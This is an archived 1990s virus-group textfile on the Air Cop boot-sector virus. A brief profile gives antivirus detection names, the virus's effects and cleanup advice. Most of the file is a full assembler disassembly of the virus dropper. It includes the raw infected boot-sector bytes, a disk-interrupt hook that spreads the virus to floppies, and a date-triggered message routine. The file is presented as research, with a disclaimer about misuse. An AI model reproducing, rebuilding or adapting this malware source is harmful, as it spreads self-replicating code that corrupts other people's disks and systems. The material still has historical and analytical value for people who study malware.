informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/virus/avcr-01.007

510 lines
22 KiB
Plaintext
Raw Permalink Blame History

ÛÛÛÛÛÛÛ Û Û ÛÛÛÛÛÛÛÛÛ Û ÛÛÛÛÛÛÛÛ
Û Û Û Û Û ÛÛÛ ÛÛ
Û Û Û Û Û Û ÛÛ
ÛÛÛÛÛÛÛÛÛÛÛ Û Û Û Û
Û Û Û Û Û Û
Û Û Û Û Û Û
Û Û ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛ Û
ÛÛÛ ÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛÛ Û Û Û ÛÛÛÛÛÛÛ
Û ÛÛÛ Û Û Û Û Û Û ÛÛ Û ÛÛ Û Û
Û Û Û Û Û ÛÛÛÛ Û Û ÛÛ Û Û Û Û ÛÛÛÛÛ
Û Û ÛÛÛÛÛÛÛÛ Û ÛÛ ÛÛÛÛÛÛÛÛ ÛÛ Û Û Û Û Û
Û Û Û Û ÛÛÛÛÛÛÛ Û Û ÛÛÛÛÛÛÛÛ Û Û ÛÛ ÛÛÛÛÛÛÛ
Distributed By Amateur Virus Creation & Research Group (AVCR)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Research of the Air Cop Virus
by
Security Threat
Name of Virus: Air Cop
-----------------------------------------------------------------------------
Alias: Air Dropper
-----------------------------------------------------------------------------
Type Of Code: Not Informed
-----------------------------------------------------------------------------
VSUM Information - Resident boot
-----------------------------------------------------------------------------
Antivirus Detection:
(1)
ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus
(2)
Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper
(3)
McAfee Softwares Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus
(4)
MicroSoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper
-----------------------------------------------------------------------------
Execution Results: It is a resident boot virus and it installs itself into
C:\ giving you an error saying "Non-system disk please replace and hit enter"
-----------------------------------------------------------------------------
Cleaning Recommendations: Cleaning is impossible but to rid your machine of
the virus a boot off of a boot disk is needed and if drive C: can be acessed
it must be reformatted.
-----------------------------------------------------------------------------
Researcher's Notes: Reads "STACK!" many times over and gives a warning line
then states that the virus is written by RABID development Corp.
-----------------------------------------------------------------------------
Disassembly of the AirCop Virus
-----------------------------------------------------------------------------
PAGE 59,132
;==========================================================================
;== ==
;== AIRCOP ==
;== ==
;== Created: 11-Jan-91 ==
;== Version: ==
;== Passes: 5 Analysis Options on: ABFMNOPU ==
;== ==
;== ==
;==========================================================================
movseg macro reg16, unused, Imm16 ; Fixup for Assembler
ifidn <reg16>, <bx>
db 0BBh
endif
ifidn <reg16>, <cx>
db 0B9h
endif
ifidn <reg16>, <dx>
db 0BAh
endif
ifidn <reg16>, <si>
db 0BEh
endif
ifidn <reg16>, <di>
db 0BFh
endif
ifidn <reg16>, <bp>
db 0BDh
endif
ifidn <reg16>, <sp>
db 0BCh
endif
ifidn <reg16>, <BX>
db 0BBH
endif
ifidn <reg16>, <CX>
db 0B9H
endif
ifidn <reg16>, <DX>
db 0BAH
endif
ifidn <reg16>, <SI>
db 0BEH
endif
ifidn <reg16>, <DI>
db 0BFH
endif
ifidn <reg16>, <BP>
db 0BDH
endif
ifidn <reg16>, <SP>
db 0BCH
endif
dw seg Imm16
endm
keybd_q_head EQU 1AH ; (0040:001A=2CH)
keybd_q_tail EQU 1CH ; (0040:001C=2CH)
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
AIRCOP PROC FAR
START:
MOV AX,CS
MOV DS,AX
MOV SP,3B6H
MOV AH,0
MOV AL,3
INT 10H ; Video display ah=functn 00h
; set display mode in al
MOV DX,52BH
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,3C3H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,4E5H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,464H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV DX,480H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,40H
MOV ES,AX
PUSH WORD PTR ES:keybd_q_tail ; (0040:001C=2CH)
POP WORD PTR ES:keybd_q_head ; (0040:001A=2CH)
MOV AX,CS
MOV ES,AX
MOV AH,8
INT 21H ; DOS Services ah=function 08h
; get keybd char al, no echo
MOV CX,3
LOCLOOP_1:
PUSH CX
MOV AX,201H
MOV BX,5D0H
MOV CX,1
MOV DX,0
INT 13H ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
POP CX
JNC LOC_2 ; Jump if carry=0
LOOP LOCLOOP_1 ; Loop if cx > 0
MOV DX,4F2H
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,4CFFH
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
LOC_2:
MOV CX,3
LOCLOOP_3:
PUSH CX
MOV AX,301H
MOV BX,5D0H
MOV CX,2709H
MOV DX,100H
INT 13H ; Disk dl=drive a ah=func 03h
; write sectors from mem es:bx
POP CX
JNC LOC_4 ; Jump if carry=0
LOOP LOCLOOP_3 ; Loop if cx > 0
MOV DX,50EH
MOV AH,9
INT 21H ; DOS Services ah=function 09h
; display char string at ds:dx
MOV AX,4CFFH
INT 21H ; DOS Services ah=function 4Ch
; terminate with al=return code
LOC_4:
MOV CX,3
LOCLOOP_5:
PUSH CX
MOV AX,301H
MOV BX,7D0H
MOV CX,1
MOV DX,0
INT 13H ; Disk dl=drive a ah=func 03h
; write sectors from mem es:bx
POP CX
;* JNC LOC_6 ;*Jump if carry=0
DB 73H, 0EH
LOOP LOCLOOP_5 ; Loop if cx > 0
MOV DX,57CH
MOV AH,9
DATA_1 DD 0FFB821CDH
DATA_2 DD 0BA21CD4CH
DB 0E5H, 04H,0B4H, 09H,0CDH, 21H
DB 0BAH, 9EH, 05H,0B4H, 09H,0CDH
DB 21H,0B8H, 00H, 4CH,0CDH
DB 21H
DATA_3 DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 'STACK STACK STACK STACK '
DB 0DH, 0AH, 'Attention: This virus '
DB 'sample uses only in research tea'
DB 'ms.', 0DH, 0AH, ' Plea'
DB 'se do not use in joking or setti'
DB 'ng trap on someone.', 0DH, 0AH, 0DH
DB 0AH, 'Warning! This file installs'
DB ' "$'
DB '" into your 360K disk!', 0DH, 0AH
DB 0DH, 0AH
DB 7
DATA_6 DB '$'
DB 'Put a 360K (Blank Formatted) dis'
DB 'k into drive A:', 0DH, 0AH, 'Str'
DB 'ike any key to install, or CTRL-'
DB 'BREAK to quit.', 0DH, 0AH, '$'
DB 'Aircop Virus$'
DB 'Cannot read boot record.', 0DH, 0AH
DB 07H, 24H
DATA_10 DB 'Cannot write boot record.', 0DH, 0AH
DB 7, '$'
DATA_11 DB 'AIRCOP Test Version: Property of'
DB ' The RABID Nat', 27H, 'nl Develo'
DB 'pment Corp. ', 27H, '91', 0DH, 0AH
DB ' $'
DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 'Ca'
DB 'nnot write virus boot record', 0DH
DB 0AH
DB 7
DB '$'
DB ' was installed into this 360K di'
DB 'sk. BE CAREFUL!', 0DH, 0AH, '$'
DB 512 DUP (0)
DB 0EBH
DB '4', 90H, 'IBM 3.3'
DB 00H, 02H, 02H, 01H, 00H, 02H
DB 70H, 00H,0D0H, 02H,0FDH, 02H
DB 00H, 09H, 00H, 02H, 00H
DB 19 DUP (0)
DB 12H, 00H, 00H, 00H, 00H, 01H
DB 00H,0FAH, 33H,0C0H, 8EH,0D8H
DB 8EH,0D0H,0BBH, 00H, 7CH, 8BH
DB 0E3H, 1EH, 53H,0FFH, 0EH, 13H
DB 04H,0CDH, 12H,0B1H, 06H,0D3H
DB 0E0H, 8EH,0C0H, 87H, 06H, 4EH
DB 00H,0A3H,0ABH, 7DH,0B8H, 28H
DB 01H, 87H, 06H, 4CH, 00H,0A3H
DB 0A9H, 7DH, 8CH,0C0H, 87H, 06H
DB 66H, 00H,0A3H,0AFH, 7DH,0B8H
DB 0BBH, 00H, 87H, 06H, 64H, 00H
DB 0A3H,0ADH, 7DH, 33H,0FFH, 8BH
DB 0F3H,0B9H, 00H, 01H,0FCH,0F3H
DB 0A5H,0FBH, 06H,0B8H, 85H, 00H
DB 50H,0CBH, 53H, 32H,0D2H,0E8H
DB 70H, 00H, 5BH, 1EH, 07H,0B4H
DB 02H,0B6H, 01H,0E8H, 8AH, 00H
DB 72H, 10H, 0EH, 1FH,0BEH, 0BH
DB 00H,0BFH, 0BH, 7CH,0B9H, 2BH
DB 00H,0FCH,0F3H,0A6H, 74H, 07H
LOC_7:
POP BX
POP AX
PUSH CS
MOV AX,0AFH
PUSH AX
LOC_RET_8:
RETF ; Return far
LOC_9:
PUSH CS
POP DS
MOV SI,1DBH
CALL SUB_1 ; (08AA)
XOR AH,AH ; Zero register
INT 16H ; Keyboard i/o ah=function 00h
; get keybd char in al, ah=scan
XOR AX,AX ; Zero register
INT 13H ; Disk dl=drive a ah=func 00h
; reset disk, al=return status
PUSH CS
POP ES
MOV BX,20DH
MOV CX,6
XOR DX,DX ; Zero register
MOV AX,201H
INT 13H ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
JC LOC_9 ; Jump if carry Set
MOV CX,0FF0H
MOV DS,CX
JMP CS:DATA_2 ; (97DC:01AD=0CD4CH)
AIRCOP ENDP
;==========================================================================
; SUBROUTINE
;==========================================================================
SUB_1 PROC NEAR
LOC_10:
MOV BX,7
CLD ; Clear direction
LODSB ; String [si] to al
OR AL,AL ; Zero ?
JZ LOC_RET_14 ; Jump if zero
JNS LOC_11 ; Jump if not sign
XOR AL,0D7H
OR BL,88H
LOC_11:
CMP AL,20H ; ' '
JBE LOC_12 ; Jump if below or =
MOV CX,1
MOV AH,9
INT 10H ; Video display ah=functn 09h
; set char al & attrib bl @curs
LOC_12:
MOV AH,0EH
INT 10H ; Video display ah=functn 0Eh
; write char al, teletype mode
JMP SHORT LOC_10 ; (08AA)
;==== External Entry into Subroutine ======================================
SUB_2:
MOV BX,200H
MOV CX,2
MOV AH,CL
CALL SUB_5 ; (08ED)
MOV CX,2709H
XOR BYTE PTR ES:[BX],0FDH
JZ LOC_13 ; Jump if zero
MOV CX,4F0FH
LOC_13:
JMP SHORT LOC_RET_14 ; (08F7)
NOP
;==== External Entry into Subroutine ======================================
SUB_3:
MOV AH,2
MOV BX,200H
;==== External Entry into Subroutine ======================================
SUB_4:
MOV CX,1
;==== External Entry into Subroutine ======================================
SUB_5:
MOV DH,0
;==== External Entry into Subroutine ======================================
SUB_6:
MOV AL,1
;==== External Entry into Subroutine ======================================
SUB_7:
PUSHF ; Push flags
CALL CS:DATA_1 ; (97DC:01A9=21CDH)
LOC_RET_14:
RETN
SUB_1 ENDP
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH DS
PUSH SI
PUSH DI
PUSHF ; Push flags
PUSH CS
POP DS
CMP DL,1
JA LOC_16 ; Jump if above
AND AX,0FE00H
JZ LOC_16 ; Jump if zero
XCHG AL,CH
SHL AL,1 ; Shift w/zeros fill
ADD AL,DH
MOV AH,9
MUL AH ; ax = reg * al
ADD AX,CX
SUB AL,6
CMP AX,6
JA LOC_16 ; Jump if above
PUSH CS
POP ES
CALL SUB_3 ; (08E5)
JC LOC_15 ; Jump if carry Set
MOV DI,43H
MOV SI,250H
MOV CX,0EH
STD ; Set direction flag
REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di]
JZ LOC_16 ; Jump if zero
SUB SI,CX
SUB DI,CX
MOV CL,33H ; '3'
REP MOVSB ; Rep when cx >0 Mov [si] to es:[di]
CALL SUB_2 ; (08CB)
PUSH CX
PUSH BX
CALL SUB_3 ; (08E5)
MOV AH,3
XOR BX,BX ; Zero register
CALL SUB_4 ; (08EA)
POP BX
POP CX
JC LOC_15 ; Jump if carry Set
MOV DH,1
MOV AH,3
CALL SUB_6 ; (08EF)
LOC_15:
XOR AX,AX ; Zero register
CALL SUB_7 ; (08F1)
LOC_16:
MOV AH,4
INT 1AH ; Real time clock ah=func 04h
; read date cx=year, dx=mon/day
CMP DH,9
JNE LOC_17 ; Jump if not equal
MOV SI,1B1H
CALL SUB_1 ; (08AA)
LOC_17:
POPF ; Pop flags
POP DI
POP SI
POP DS
POP ES
POP DX
POP CX
POP BX
POP AX
JMP CS:DATA_1 ; (97DC:01A9=21CDH)
POP CX
IN AL,DX ; port 100H
ADD AL,DH
DB 0F2H,0E6H, 00H,0F0H,0DAH,0DDH
DB 20H, 83H,0BFH,0BEH,0A4H,0F7H
DB 0BEH,0A4H,0F7H, 96H,0BEH,0A5H
DB 0B4H,0B8H,0A7H,0DAH,0DDH, 00H
DB 'IO SYSMSDOS SYS', 0DH, 0AH
DB 'Non-system disk or disk error', 0DH
DB 0AH
DB 00H, 00H, 55H,0AAH
SEG_A ENDS
END START
-----------------------------------------------------------------------------
This virus was written for research purposes and RABID development
Corp. can in no way take responsibility for any damage done.
ST
Reference in New Issue View Git Blame Copy Permalink